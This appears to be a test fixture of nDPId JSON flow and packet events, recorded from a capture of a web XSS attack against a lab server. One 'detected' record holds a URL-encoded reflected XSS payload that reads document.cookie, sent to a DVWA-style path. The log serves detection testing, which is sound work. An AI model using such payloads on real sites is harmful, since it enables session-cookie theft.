-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":2,"flow_last_seen":1499347675704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675704,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6VSdi3bc6bEX36AScSBS\/AAAAgQFtAQCCAoD5WzPATubWgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":3,"flow_last_seen":1499347675704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347675704,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jIVAAD4GOVOsEAABwKgKMulUAFDpsRffnYt23YAQAOXyAwAAAQEICgE7m1oD5WzP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347678198,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678198,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86nhAAD4G21esEAABwKgKMuluAFCn23eyAAAAAKACchC2sQAAAgQFtAQCCAoBO53KAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":2,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6W5MMi3pp9t3s6AScSDKUAAAAgQFtAQCCAoD5W8\/ATudygEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":3,"flow_last_seen":1499347678199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347678199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06nlAAD4G216sEAABwKgKMuluAFCn23ezTDIt6oAQAOVpWAAAAQEICgE7ncoD5W8\/"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347679469,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347679469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80KNAAD4G9SysEAABwKgKMul8AFCXJE+kAAAAAKACchDuKwAAAgQFtAQCCAoBO58HAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":2,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6XyRTq6MlyRPpaAScSA6zgAAAgQFtAQCCAoD5XB8ATufBwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5963,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":3,"flow_last_seen":1499347679470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347679470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00KRAAD4G9TOsEAABwKgKMul8AFCXJE+lkU6ujYAQAOXZ1AAAAQEICgE7nwgD5XB8"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347680746,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347680746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qSxAAD4GHKSsEAABwKgKMumKAFCMLAlrAAAAAKACchA+DwAAAgQFtAQCCAoBO6BHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":2,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6YpeBd3IjCwJbKAScSCNfgAAAgQFtAQCCAoD5XG8ATugRwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":3,"flow_last_seen":1499347680747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347680747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qS1AAD4GHKusEAABwKgKMumKAFCMLAlsXgXdyYAQAOUshgAAAQEICgE7oEcD5XG8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347683313,"flow_last_seen":1499347683313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347683313,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1499347683313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x61AAD4G\/iKsEAABwKgKMumkAFCTI2VlAAAAAKACchDYggAAAgQFtAQCCAoBO6LIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":2,"flow_last_seen":1499347683313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6aQ4uuFckyNlZqAScSBHKAAAAgQFtAQCCAoD5XQ9ATuiyAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":3,"flow_last_seen":1499347683314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347683314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x65AAD4G\/imsEAABwKgKMumkAFCTI2VmOLrhXYAQAOXmLgAAAQEICgE7oskD5XQ9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347684563,"flow_last_seen":1499347684563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347684563,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1499347684563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82yNAAD4G6qysEAABwKgKMumyAFDf7X8iAAAAAKACchBwtAAAAgQFtAQCCAoBO6QBAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":2,"flow_last_seen":1499347684563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6bLDIQ3O3+1\/I6AScSAnSAAAAgQFtAQCCAoD5XV2ATukAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":3,"flow_last_seen":1499347684564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347684564,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02yRAAD4G6rOsEAABwKgKMumyAFDf7X8jwyENz4AQAOXGTwAAAQEICgE7pAED5XV2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347687089,"flow_last_seen":1499347687089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347687089,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1499347687089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UahAAD4GdCisEAABwKgKMunMAFBn2\/fQAAAAAKACchBthwAAAgQFtAQCCAoBO6Z4AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":2,"flow_last_seen":1499347687089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6cx2j8kIZ9v30aAScSCy+wAAAgQFtAQCCAoD5XftATumeAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":3,"flow_last_seen":1499347687090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347687090,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UalAAD4GdC+sEAABwKgKMunMAFBn2\/fRdo\/JCYAQAOVSAgAAAQEICgE7pnkD5Xft"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347688364,"flow_last_seen":1499347688364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1499347688364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C45AAD4GukKsEAABwKgKMunaAFB\/Haw5AAAAAKACchCgjwAAAgQFtAQCCAoBO6e3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":2,"flow_last_seen":1499347688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347688365,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6dpm6d+Cfx2sOqAScSDd8AAAAgQFtAQCCAoD5XksATuntwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":3,"flow_last_seen":1499347688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347688365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C49AAD4GukmsEAABwKgKMunaAFB\/Haw6Zunfg4AQAOV8+AAAAQEICgE7p7cD5Xks"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347555255,"flow_last_seen":1499347560767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 